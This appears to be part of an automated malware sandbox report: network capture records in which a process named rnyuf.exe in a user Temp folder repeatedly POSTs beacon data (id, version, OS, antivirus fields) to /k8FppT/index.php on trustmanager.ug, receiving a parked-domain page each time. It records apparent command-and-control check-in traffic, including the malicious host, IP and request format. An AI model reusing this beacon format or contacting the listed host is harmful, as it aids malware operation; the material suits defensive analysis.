Aug 23, 2021 02:09:00.736862898 CEST	15791	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:00.763499022 CEST	15793	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.763535976 CEST	15793	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.3	49778	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.894941092 CEST	15801	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:00.921181917 CEST	15802	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.921197891 CEST	15803	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.3	49779	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:01.055171013 CEST	15803	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:01.081334114 CEST	15805	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:01.081373930 CEST	15805	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.3	49780	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:01.226782084 CEST	15821	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:01.252722979 CEST	15822	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 